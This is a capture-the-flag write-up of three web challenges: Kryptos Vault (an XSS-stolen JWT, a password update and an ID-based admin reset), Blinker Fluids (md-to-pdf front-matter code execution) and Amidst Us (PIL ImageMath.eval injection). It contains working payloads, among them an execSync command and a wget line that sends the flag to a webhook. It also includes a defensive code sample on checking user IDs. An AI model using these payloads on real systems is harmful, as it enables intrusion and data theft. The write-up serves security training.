# Web

## Kryptos Vault - h3cko

The ticket system is vulnerable to XSS. In the background a headless browser views the tickets. After digging into the application you can obtain the user's JWT session token via XSS.

If you take a closer look at the backend site through the XSS request, you will see that there is another page, `/Settings`, and a corresponding JS file that makes the page work: `http://46.101.59.228:32680/static/js/settings.js`.

It is possible to update the Moderator's password via this endpoint using the JWT:

~~~
POST /api/users/update HTTP/1.1
Host: 46.101.59.228:32680
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Type: application/json
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI1NTM1MjB9.Dxm6QvRflpHNA5c45rFbqwa6BlURV4hHDw2KA0Q3GqY
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 57

{
  "password": "mystronpassword123!",
  "uid": "100"
}
~~~

You are now able to access the backend as Moderator. It contains some sensitive information about two users' Krypto vaults:

~~~
I have lost my rfid for the vault. My vault serial is 000083921. Please send me a new rfid.

Vault 000076439 requires maintenance.
~~~

But there is nothing further to do on this site. There is still the "password reset" endpoint, which does not require you to provide a username, just an ID.
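Both endpoints act on a client-supplied user ID. As an added example (not the challenge's code; it assumes an HS256 session JWT like the one above, a constructed demo secret, and stdlib-only verification), here is the pattern the writeup abuses beside the hardened form that derives the target user from the verified session:

```python
import base64
import hashlib
import hmac
import json

# Constructed demo secret; the challenge's real signing key is not on the page.
DEMO_SECRET = b"demo-secret-not-the-real-one"


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def mint_hs256(claims: dict, secret: bytes) -> str:
    """Issue an HS256 JWT (used here only to build demo sessions)."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"

def verify_hs256(token: str, secret: bytes) -> dict:
    """Return the claims of a validly signed HS256 token; raise ValueError otherwise."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    # Pin the algorithm: never let the token's own header choose it (e.g. 'none').
    if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload_b64))

def target_uid_vulnerable(token: str, body: dict, secret: bytes) -> int:
    """The pattern the writeup abuses: any valid session may name any uid in the body."""
    verify_hs256(token, secret)
    return int(body["uid"])

def target_uid_hardened(token: str, body: dict, secret: bytes) -> int:
    """Derive the target from the verified session; reject a body uid that differs."""
    session_uid = int(verify_hs256(token, secret)["uid"])
    if "uid" in body and int(body["uid"]) != session_uid:
        raise PermissionError("uid in body does not match the session")
    return session_uid
```

The same rule applies to the reset endpoint: a reset should be keyed to a proof of identity (a verified session or an emailed one-time token), never to a bare numeric ID.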
After trying some IDs I noticed that it is possible to reset the password for user ID "1", which is `admin`. After logging in as `admin` you can grab the flag :)

## Blinker Fluids - h3cko

POC:

```
---js
((require("child_process")).execSync("cat /flag.txt > /app/static/invoices/f0daa85f-b9de-4b78-beff-2f86e242d6ac.txt"))
---RCE
```

Reference: https://github.com/simonhaenisch/md-to-pdf/issues/99

You can retrieve the flag afterwards at `http://<url>:<Port>/static/invoices/f0daa85f-b9de-4b78-beff-2f86e242d6ac.txt`.

## Amidst Us - Matixx22

Looking at the source code we see that it uses the `PIL` package. There is a vulnerable function, `ImageMath.eval`, in `utils.py` (`CVE-2022-22817`).

```python
# Excerpt from the challenge's utils.py: color[0..2] come straight from the
# request's background parameter and are interpolated into the evaluated expression.
alpha = ImageMath.eval(
    f'''float(
        max(
            max(
                max(
                    difference1(red_band, {color[0]}),
                    difference1(green_band, {color[1]})
                ),
                difference1(blue_band, {color[2]})
            ),
            max(
                max(
                    difference2(red_band, {color[0]}),
                    difference2(green_band, {color[1]})
                ),
                difference2(blue_band, {color[2]})
            )
        )
    )''',
```

Since we control the background parameter in a request, we can execute commands. Let's grab the flag into an environment variable and pass it to a webhook as a parameter (I used an ngrok proxy and a Python server to see the parameter). Put it in one of the background's fields:

![](https://i.imgur.com/S6MVaI7.png)

Payload: ``"exec('import os;os.system(\"TEMP=$(cat ../flag.txt);wget https://<some_kind_of_webhook>/?result=${TEMP}\")')"``

Make a request and get the flag.

![](https://i.imgur.com/6J8ovND.png)

Flag: `HTB{i_slept_my_way_to_rce}`